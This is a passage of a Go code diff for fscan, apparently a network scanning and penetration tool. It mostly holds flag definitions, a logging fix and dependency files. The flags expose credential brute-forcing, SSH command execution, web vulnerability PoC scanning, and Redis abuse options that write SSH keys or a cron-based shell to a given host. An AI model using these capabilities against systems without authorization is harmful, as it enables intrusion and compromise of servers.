-	flag.StringVar(&Info.Scantype,"m","all","Select scan type ,as: -m ssh")
-	flag.StringVar(&Info.RedisFile,"rf","","redis file to write sshkey file (as: -rf id_rsa.pub) ")
-	flag.StringVar(&Info.RedisFile,"rs","","redis shell to write cron file (as: -rs 192.168.1.1:6666) ")
+	flag.StringVar(&Info.Host, "h", "", "IP address of the host you want to scan,for example: 192.168.11.11 | 192.168.11.11-255 | 192.168.11.11,192.168.11.12")
+	flag.StringVar(&Info.HostFile, "hf", "", "host file, -hs ip.txt")
+	flag.StringVar(&Info.Ports, "p", DefaultPorts, "Select a port,for example: 22 | 1-65535 | 22,80,3306")
+	flag.StringVar(&Info.Command, "c", "", "exec command (ssh)")
+	flag.IntVar(&Info.Threads, "t", 200, "Thread nums")
+	flag.IntVar(&Info.IcmpThreads, "it", 11000, "Icmp Threads nums")
+	flag.BoolVar(&Info.Isping, "np", false, "not to ping")
+	flag.BoolVar(&Info.Ping, "ping", false, "using ping replace icmp")
+	flag.BoolVar(&Info.IsSave, "no", false, "not to save output log")
+	flag.StringVar(&Info.Domain, "domain", "", "smb domain")
+	flag.StringVar(&Info.Username, "user", "", "username")
+	flag.StringVar(&Info.Userfile, "userf", "", "username file")
+	flag.StringVar(&Info.Password, "pwd", "", "password")
+	flag.StringVar(&Info.Passfile, "pwdf", "", "password file")
+	flag.StringVar(&Info.Outputfile, "o", "result.txt", "Outputfile")
+	flag.Int64Var(&Info.Timeout, "time", 3, "Set timeout")
+	flag.Int64Var(&Info.WebTimeout, "wt", 3, "Set web timeout")
+	flag.StringVar(&Info.Scantype, "m", "all", "Select scan type ,as: -m ssh")
+	flag.StringVar(&Info.RedisFile, "rf", "", "redis file to write sshkey file (as: -rf id_rsa.pub) ")
+	flag.StringVar(&Info.RedisShell, "rs", "", "redis shell to write cron file (as: -rs 192.168.1.1:6666) ")
+
+	flag.BoolVar(&Info.IsWebCan, "nopoc", false, "not to scan web vul")
+	flag.StringVar(&Info.PocInfo.PocName, "pocname", "", "use the pocs these contain pocname, -pocname weblogic")
+	flag.StringVar(&Info.PocInfo.Proxy, "proxy", "", "set poc proxy, -proxy http://127.0.0.1:8080")
+	flag.IntVar(&Info.PocInfo.Num, "Num", 20, "poc rate")
 	flag.Parse()
-}
+}

common/log.go

@@ -17,7 +17,7 @@ func LogSuccess(result string){
 }
 func WriteFile(result string,filename string)  {
 	var text = []byte(result+"\n")
-	fl, err := os.OpenFile(filename, os.O_APPEND|os.O_CREATE, 0777)
+	fl, err := os.OpenFile(filename, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0777)
 	if err != nil {
 		fmt.Println(err)
 		return

go.mod

@@ -0,0 +1,20 @@
+module github.com/shadow1ng/fscan
+
+go 1.15
+
+require (
+	github.com/antlr/antlr4 v0.0.0-20200503195918-621b933c7a7f // indirect
+	github.com/denisenkom/go-mssqldb v0.9.0
+	github.com/go-sql-driver/mysql v1.5.0
+	github.com/golang/protobuf v1.4.1
+	github.com/google/cel-go v0.4.2
+	github.com/jlaffaye/ftp v0.0.0-20201112195030-9aae4d151126
+	github.com/lib/pq v1.8.0
+	github.com/stacktitan/smb v0.0.0-20190531122847-da9a425dceb8
+	golang.org/x/crypto v0.0.0-20201116153603-4be66e5b6582
+	golang.org/x/net v0.0.0-20200505041828-1ed23360d12c // indirect
+	golang.org/x/sys v0.0.0-20200501145240-bc7a7d42d5c3 // indirect
+	google.golang.org/genproto v0.0.0-20200430143042-b979b6f78d84
+	google.golang.org/grpc v1.29.1 // indirect
+	gopkg.in/yaml.v3 v3.0.0-20200615113413-eeeca48fe776
+)

go.sum

@@ -0,0 +1,120 @@
+cloud.google.com/go v0.26.0/go.mod h1:aQUYkXzVsufM+DwF1aE+0xfcU+56JwCaLick0ClmMTw=
+github.com/BurntSushi/toml v0.3.1/go.mod h1:xHWCNGjB5oqiDr8zfno3MHue2Ht5sIBksp03qcyfWMU=
+github.com/antlr/antlr4 v0.0.0-20190819145818-b43a4c3a8015/go.mod h1:T7PbCXFs94rrTttyxjbyT5+/1V8T2TYDejxUfHJjw1Y=
+github.com/antlr/antlr4 v0.0.0-20200503195918-621b933c7a7f h1:0cEys61Sr2hUBEXfNV8eyQP01oZuBgoMeHunebPirK8=
+github.com/antlr/antlr4 v0.0.0-20200503195918-621b933c7a7f/go.mod h1:T7PbCXFs94rrTttyxjbyT5+/1V8T2TYDejxUfHJjw1Y=
+github.com/census-instrumentation/opencensus-proto v0.2.1/go.mod h1:f6KPmirojxKA12rnyqOA5BBL4O983OfeGPqjHWSTneU=
+github.com/client9/misspell v0.3.4/go.mod h1:qj6jICC3Q7zFZvVWo7KLAzC3yx5G7kyvSDkc90ppPyw=
+github.com/cncf/udpa/go v0.0.0-20191209042840-269d4d468f6f/go.mod h1:M8M6+tZqaGXZJjfX53e64911xZQV5JYwmTeXPW+k8Sc=
+github.com/davecgh/go-spew v1.1.0 h1:ZDRjVQ15GmhC3fiQ8ni8+OwkZQO4DARzQgrnXU1Liz8=
+github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
+github.com/denisenkom/go-mssqldb v0.9.0 h1:RSohk2RsiZqLZ0zCjtfn3S4Gp4exhpBWHyQ7D0yGjAk=
+github.com/denisenkom/go-mssqldb v0.9.0/go.mod h1:xbL0rPBG9cCiLr28tMa8zpbdarY27NDyej4t/EjAShU=
+github.com/envoyproxy/go-control-plane v0.9.0/go.mod h1:YTl/9mNaCwkRvm6d1a2C3ymFceY/DCBVvsKhRF0iEA4=
+github.com/envoyproxy/go-control-plane v0.9.1-0.20191026205805-5f8ba28d4473/go.mod h1:YTl/9mNaCwkRvm6d1a2C3ymFceY/DCBVvsKhRF0iEA4=
+github.com/envoyproxy/go-control-plane v0.9.4/go.mod h1:6rpuAdCZL397s3pYoYcLgu1mIlRU8Am5FuJP05cCM98=
+github.com/envoyproxy/protoc-gen-validate v0.1.0/go.mod h1:iSmxcyjqTsJpI2R4NaDN7+kN2VEUnK/pcBlmesArF7c=
+github.com/go-sql-driver/mysql v1.5.0 h1:ozyZYNQW3x3HtqT1jira07DN2PArx2v7/mN66gGcHOs=
+github.com/go-sql-driver/mysql v1.5.0/go.mod h1:DCzpHaOWr8IXmIStZouvnhqoel9Qv2LBy8hT2VhHyBg=
+github.com/golang-sql/civil v0.0.0-20190719163853-cb61b32ac6fe h1:lXe2qZdvpiX5WZkZR4hgp4KJVfY3nMkvmwbVkpv1rVY=
+github.com/golang-sql/civil v0.0.0-20190719163853-cb61b32ac6fe/go.mod h1:8vg3r2VgvsThLBIFL93Qb5yWzgyZWhEmBwUJWevAkK0=
+github.com/golang/glog v0.0.0-20160126235308-23def4e6c14b/go.mod h1:SBH7ygxi8pfUlaOkMMuAQtPIUF8ecWP5IEl/CR7VP2Q=
+github.com/golang/mock v1.1.1/go.mod h1:oTYuIxOrZwtPieC+H1uAHpcLFnEyAGVDL/k47Jfbm0A=
+github.com/golang/protobuf v1.2.0/go.mod h1:6lQm79b+lXiMfvg/cZm0SGofjICqVBUtrP5yJMmIC1U=
+github.com/golang/protobuf v1.3.2/go.mod h1:6lQm79b+lXiMfvg/cZm0SGofjICqVBUtrP5yJMmIC1U=
+github.com/golang/protobuf v1.3.3/go.mod h1:vzj43D7+SQXF/4pzW/hwtAqwc6iTitCiVSaWz5lYuqw=
+github.com/golang/protobuf v1.3.4/go.mod h1:vzj43D7+SQXF/4pzW/hwtAqwc6iTitCiVSaWz5lYuqw=
+github.com/golang/protobuf v1.4.0-rc.1/go.mod h1:ceaxUfeHdC40wWswd/P6IGgMaK3YpKi5j83Wpe3EHw8=
+github.com/golang/protobuf v1.4.0-rc.1.0.20200221234624-67d41d38c208/go.mod h1:xKAWHe0F5eneWXFV3EuXVDTCmh+JuBKY0li0aMyXATA=
+github.com/golang/protobuf v1.4.0-rc.2/go.mod h1:LlEzMj4AhA7rCAGe4KMBDvJI+AwstrUpVNzEA03Pprs=
+github.com/golang/protobuf v1.4.0-rc.4.0.20200313231945-b860323f09d0/go.mod h1:WU3c8KckQ9AFe+yFwt9sWVRKCVIyN9cPHBJSNnbL67w=
+github.com/golang/protobuf v1.4.0/go.mod h1:jodUvKwWbYaEsadDk5Fwe5c77LiNKVO9IDvqG2KuDX0=
+github.com/golang/protobuf v1.4.1 h1:ZFgWrT+bLgsYPirOnRfKLYJLvssAegOj/hgyMFdJZe0=
+github.com/golang/protobuf v1.4.1/go.mod h1:U8fpvMrcmy5pZrNK1lt4xCsGvpyWQ/VVv6QDs8UjoX8=
+github.com/google/cel-go v0.4.2 h1:Fx1DQPo05qFcDst4TwiGgFfmTjjHsLLbLYQGX67QYUk=
+github.com/google/cel-go v0.4.2/go.mod h1:0pIisECLUDurNyQcYRcNjhGp0j/yM6v617EmXsBJE3A=
+github.com/google/cel-spec v0.4.0/go.mod h1:2pBM5cU4UKjbPDXBgwWkiwBsVgnxknuEJ7C5TDWwORQ=
+github.com/google/go-cmp v0.2.0/go.mod h1:oXzfMopK8JAjlY9xF4vHSVASa0yLyX7SntLO5aqRK0M=
+github.com/google/go-cmp v0.3.0/go.mod h1:8QqcDgzrUqlUb/G2PQTWiueGozuR1884gddMywk6iLU=
+github.com/google/go-cmp v0.3.1/go.mod h1:8QqcDgzrUqlUb/G2PQTWiueGozuR1884gddMywk6iLU=
+github.com/google/go-cmp v0.4.0 h1:xsAVV57WRhGj6kEIi8ReJzQlHHqcBYCElAvkovg3B/4=
+github.com/google/go-cmp v0.4.0/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE=
+github.com/jlaffaye/ftp v0.0.0-20201112195030-9aae4d151126 h1:ly2C51IMpCCV8RpTDRXgzG/L9iZXb8ePEixaew/HwBs=
+github.com/jlaffaye/ftp v0.0.0-20201112195030-9aae4d151126/go.mod h1:2lmrmq866uF2tnje75wQHzmPXhmSWUt7Gyx2vgK1RCU=
+github.com/lib/pq v1.8.0 h1:9xohqzkUwzR4Ga4ivdTcawVS89YSDVxXMa3xJX3cGzg=
+github.com/lib/pq v1.8.0/go.mod h1:AlVN5x4E4T544tWzH6hKfbfQvm3HdbOxrmggDNAPY9o=
+github.com/pmezard/go-difflib v1.0.0 h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM=
+github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4=
+github.com/prometheus/client_model v0.0.0-20190812154241-14fe0d1b01d4/go.mod h1:xMI15A0UPsDsEKsMN9yxemIoYk6Tm2C1GtYGdfGttqA=
+github.com/stacktitan/smb v0.0.0-20190531122847-da9a425dceb8 h1:GVFkBBJAEO3CpzIYcDDBdpUObzKwVW9okNWcLYL/nnU=
+github.com/stacktitan/smb v0.0.0-20190531122847-da9a425dceb8/go.mod h1:phLSETqH/UJsBtwDVBxSfJKwwkbJcGyy2Q/h4k+bmww=
+github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME=
+github.com/stretchr/testify v1.6.1 h1:hDPOHmpOpP40lSULcqw7IrRb/u7w6RpDC9399XyoNd0=
+github.com/stretchr/testify v1.6.1/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg=
+golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w=
+golang.org/x/crypto v0.0.0-20190325154230-a5d413f7728c/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w=
+golang.org/x/crypto v0.0.0-20201116153603-4be66e5b6582 h1:0WDrJ1E7UolDk1KhTXxxw3Fc8qtk5x7dHP431KHEJls=
+golang.org/x/crypto v0.0.0-20201116153603-4be66e5b6582/go.mod h1:tCqSYrHVcf3i63Co2FzBkTCo2gdF6Zak62921dSfraU=
+golang.org/x/exp v0.0.0-20190121172915-509febef88a4/go.mod h1:CJ0aWSM057203Lf6IL+f9T1iT9GByDxfZKAQTCR3kQA=
+golang.org/x/lint v0.0.0-20181026193005-c67002cb31c3/go.mod h1:UVdnD1Gm6xHRNCYTkRU2/jEulfH38KcIWyp/GAMgvoE=
+golang.org/x/lint v0.0.0-20190227174305-5b3e6a55c961/go.mod h1:wehouNa3lNwaWXcvxsM5YxQ5yQlVC4a0KAMCusXpPoU=
+golang.org/x/lint v0.0.0-20190313153728-d0100b6bd8b3/go.mod h1:6SW0HCj/g11FgYtHlgUYUwCkIfeOF89ocIRzGO/8vkc=
+golang.org/x/net v0.0.0-20180724234803-3673e40ba225/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4=
+golang.org/x/net v0.0.0-20180826012351-8a410e7b638d/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4=
+golang.org/x/net v0.0.0-20190213061140-3a22650c66bd/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4=
+golang.org/x/net v0.0.0-20190311183353-d8887717615a/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg=
+golang.org/x/net v0.0.0-20190404232315-eb5bcb51f2a3/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg=
+golang.org/x/net v0.0.0-20200301022130-244492dfa37a/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s=
+golang.org/x/net v0.0.0-20200505041828-1ed23360d12c h1:zJ0mtu4jCalhKg6Oaukv6iIkb+cOvDrajDH9DH46Q4M=
+golang.org/x/net v0.0.0-20200505041828-1ed23360d12c/go.mod h1:qpuaurCH72eLCgpAm/N6yyVIVM9cpaDIP3A8BGJEC5A=
+golang.org/x/oauth2 v0.0.0-20180821212333-d2e6202438be/go.mod h1:N/0e6XlmueqKjAGxoOufVs8QHGRruUQn6yWY3a++T0U=
+golang.org/x/sync v0.0.0-20180314180146-1d60e4601c6f/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
+golang.org/x/sync v0.0.0-20181108010431-42b317875d0f/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
+golang.org/x/sync v0.0.0-20190423024810-112230192c58/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
+golang.org/x/sys v0.0.0-20180830151530-49385e6e1522/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
+golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
+golang.org/x/sys v0.0.0-20191026070338-33540a1f6037/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
+golang.org/x/sys v0.0.0-20200302150141-5c8b2ff67527/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
+golang.org/x/sys v0.0.0-20200323222414-85ca7c5b95cd/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
+golang.org/x/sys v0.0.0-20200501145240-bc7a7d42d5c3 h1:5B6i6EAiSYyejWfvc5Rc9BbI3rzIsrrXfAQBWnYfn+w=
+golang.org/x/sys v0.0.0-20200501145240-bc7a7d42d5c3/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
+golang.org/x/term v0.0.0-20201113234701-d7a72108b828 h1:htWEtQEuEVJ4tU/Ngx7Cd/4Q7e3A5Up1owgyBtVsTwk=
+golang.org/x/term v0.0.0-20201113234701-d7a72108b828/go.mod h1:Nr5EML6q2oocZ2LXRh80K7BxOlk5/8JxuGnuhpl+muw=
+golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ=
+golang.org/x/text v0.3.2 h1:tW2bmiBqwgJj/UpqtC8EpXEZVYOwU0yG4iWbprSVAcs=
+golang.org/x/text v0.3.2/go.mod h1:bEr9sfX3Q8Zfm5fL9x+3itogRgK3+ptLWKqgva+5dAk=
+golang.org/x/tools v0.0.0-20180917221912-90fa682c2a6e/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ=
+golang.org/x/tools v0.0.0-20190114222345-bf090417da8b/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ=
+golang.org/x/tools v0.0.0-20190226205152-f727befe758c/go.mod h1:9Yl7xja0Znq3iFh3HoIrodX9oNMXvdceNzlUR8zjMvY=
+golang.org/x/tools v0.0.0-20190311212946-11955173bddd/go.mod h1:LCzVGOaR6xXOjkQ3onu1FJEFr0SW1gC7cKk1uF8kGRs=
+golang.org/x/tools v0.0.0-20190524140312-2c0ae7006135/go.mod h1:RgjU9mgBXZiqYHBnxXauZ1Gv1EHHAz9KjViQ78xBX0Q=
+golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543 h1:E7g+9GITq07hpfrRu66IVDexMakfv52eLZ2CXBWiKr4=
+golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
+google.golang.org/appengine v1.1.0/go.mod h1:EbEs0AVv82hx2wNQdGPgUI5lhzA/G0D9YwlJXL52JkM=
+google.golang.org/appengine v1.4.0/go.mod h1:xpcJRLb0r/rnEns0DIKYYv+WjYCduHsrkT7/EB5XEv4=
+google.golang.org/genproto v0.0.0-20180817151627-c66870c02cf8/go.mod h1:JiN7NxoALGmiZfu7CAH4rXhgtRTLTxftemlI0sWmxmc=
+google.golang.org/genproto v0.0.0-20190819201941-24fa4b261c55/go.mod h1:DMBHOl98Agz4BDEuKkezgsaosCRResVns1a3J2ZsMNc=
+google.golang.org/genproto v0.0.0-20200305110556-506484158171/go.mod h1:55QSHmfGQM9UVYDPBsyGGes0y52j32PQ3BqQfXhyH3c=
+google.golang.org/genproto v0.0.0-20200430143042-b979b6f78d84 h1:pSLkPbrjnPyLDYUO2VM9mDLqo2V6CFBY84lFSZAfoi4=
+google.golang.org/genproto v0.0.0-20200430143042-b979b6f78d84/go.mod h1:55QSHmfGQM9UVYDPBsyGGes0y52j32PQ3BqQfXhyH3c=
+google.golang.org/grpc v1.19.0/go.mod h1:mqu4LbDTu4XGKhr4mRzUsmM4RtVoemTSY81AxZiDr8c=
+google.golang.org/grpc v1.23.0/go.mod h1:Y5yQAOtifL1yxbo5wqy6BxZv8vAUGQwXBOALyacEbxg=
+google.golang.org/grpc v1.25.1/go.mod h1:c3i+UQWmh7LiEpx4sFZnkU36qjEYZ0imhYfXVyQciAY=
+google.golang.org/grpc v1.27.0/go.mod h1:qbnxyOmOxrQa7FizSgH+ReBfzJrCY1pSN7KXBS8abTk=
+google.golang.org/grpc v1.27.1/go.mod h1:qbnxyOmOxrQa7FizSgH+ReBfzJrCY1pSN7KXBS8abTk=
+google.golang.org/grpc v1.29.1 h1:EC2SB8S04d2r73uptxphDSUG+kTKVgjRPF+N3xpxRB4=
+google.golang.org/grpc v1.29.1/go.mod h1:itym6AZVZYACWQqET3MqgPpjcuV5QH3BxFS3IjizoKk=
+google.golang.org/protobuf v0.0.0-20200109180630-ec00e32a8dfd/go.mod h1:DFci5gLYBciE7Vtevhsrf46CRTquxDuWsQurQQe4oz8=
+google.golang.org/protobuf v0.0.0-20200221191635-4d8936d0db64/go.mod h1:kwYJMbMJ01Woi6D6+Kah6886xMZcty6N08ah7+eCXa0=
+google.golang.org/protobuf v0.0.0-20200228230310-ab0ca4ff8a60/go.mod h1:cfTl7dwQJ+fmap5saPgwCLgHXTUD7jkjRqWcaiX5VyM=
+google.golang.org/protobuf v1.20.1-0.20200309200217-e05f789c0967/go.mod h1:A+miEFZTKqfCUM6K7xSMQL9OKL/b6hQv+e19PK+JZNE=
+google.golang.org/protobuf v1.21.0/go.mod h1:47Nbq4nVaFHyn7ilMalzfO3qCViNmqZ2kzikPIcrTAo=
+google.golang.org/protobuf v1.22.0 h1:cJv5/xdbk1NnMPR1VP9+HU6gupuG9MLBoH1r6RHZ2MY=
+google.golang.org/protobuf v1.22.0/go.mod h1:EGpADcykh3NcUnDUJcl1+ZksZNG86OlYog2l/sGQquU=
+gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405 h1:yhCVgyC4o1eVCa2tZl7eS0r+SDo693bJlVdllGtEeKM=
+gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0=
+gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM=
+gopkg.in/yaml.v3 v3.0.0-20200615113413-eeeca48fe776 h1:tQIYjPdBoyREyB9XMu+nnTclpTYkz2zFM+lzLJFO4gQ=
+gopkg.in/yaml.v3 v3.0.0-20200615113413-eeeca48fe776/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM=
+honnef.co/go/tools v0.0.0-20190102054323-c2f93a96b099/go.mod h1:rf3lG4BRIbNafJWhAfAdb/ePZxsR/4RtNHQocxwk9r4=
+honnef.co/go/tools v0.0.0-20190523083050-ea95bdfd59fc/go.mod h1:rf3lG4BRIbNafJWhAfAdb/ePZxsR/4RtNHQocxwk9r4=

main.go

@@ -1,20 +1,15 @@
 package main
 
 import (
-	"./Plugins"
-	"./common"
 	"fmt"
+	"github.com/shadow1ng/fscan/Plugins"
+	"github.com/shadow1ng/fscan/common"
 )
 
-
 func main() {
 	var Info common.HostInfo
-	common.Flag(&Info) 	//fmt.Println(Info.Host,Info.Ports)
+	common.Flag(&Info)
 	common.Parse(&Info)
-	Plugins.Scan(&Info)
+	Plugins.Scan(Info)
 	fmt.Println("scan end")
 }
-
-
-
-